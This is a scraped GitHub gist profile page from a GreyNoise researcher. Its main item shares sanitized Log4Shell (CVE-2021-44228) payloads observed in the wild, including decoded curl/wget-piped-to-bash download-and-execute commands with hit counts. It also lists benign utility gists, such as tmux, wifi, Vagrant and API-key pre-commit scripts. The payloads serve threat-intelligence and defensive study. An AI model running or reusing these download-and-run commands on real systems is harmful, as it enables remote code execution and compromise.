Skip to content

Instantly share code, notes, and snippets.


nate nathanqthai

View GitHub Profile
nathanqthai /
Last active May 2, 2022
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence


Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.


The follow section includes Log4Shell samples seen in the wild

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

nathanqthai / base64_payloads.csv
Last active Mar 18, 2022
GreyNoise Log4Shell Payloads
View base64_payloads.csv
b64decoded hits
(curl -s<IP_ADDRESS>||wget -q -O-<IP_ADDRESS>)|bash 2056
(curl -s||wget -q -O-|bash 162
(curl -s||wget -q -O-|bash 2
#!/usr/bin/env python3
# vim: set ts=4 sw=4 ts=4 et :
import argparse
import logging
import time
import greynoise
import collections
nathanqthai /
Created Jul 11, 2019
an example of a tmux workspace setup script
# code editor
tmux new-session -d -s $session
tmux send-keys 'vim' Enter
tmux split-window -h -p 40
tmux send-keys 'htop' Enter
nathanqthai /
Created May 22, 2019
connect to wifi
[ "`whoami`" = root ] || exec sudo "$0" "$@"
wpa_supplicant -B -i ${INTERFACE} -c /etc/wpa_supplicant.conf -D nl80211,wext
dhclient -r ${INTERFACE}
dhclient ${INTERFACE}
nathanqthai /
Created May 16, 2019
CLI preview for Markdown editing
# sudo apt install ruby inotify-tools
# gem install mdless
# refreshing preview of markdown files
mdlive() {
while true; do
inotifywait -q -e close_write $1;
nathanqthai / Vagrantfile
Last active May 16, 2019
A Vagrantfile for provisioning a VM with Ghidra and X11 forwarding enabled.
View Vagrantfile
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
# ubuntu 18.04 lts = "ubuntu/bionic64"
config.vm.provider "virtualbox" do |v|
v.memory = 4096
nathanqthai /
Last active Mar 20, 2019
a git pre-commit hook to check for API keys
# stash before we mess around
STASH_NAME="pre-commit-$(date +%s)"
git stash save -q --keep-index $STASH_NAME
# regexes to find keys
nathanqthai / 38khz_adc.ino
Created Sep 24, 2017
idk im a dumpster fire atm
View 38khz_adc.ino
void setup() {
Serial.begin(115200); // use the serial port
TIMSK0 = 0; // turn off timer0 for lower jitter - delay() and millis() killed
ADCSRA = 0xe5; // set the adc to free running mode
ADMUX = 0x40; // use adc0
DIDR0 = 0x01; // turn off the digital input for adc0
void loop() {
byte buf[256];
nathanqthai / readme.txt
Last active Aug 31, 2017
simple tornado server with ssl
View readme.txt
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt
run server:
chmod +x
test server:
openssl s_client -connect localhost:8888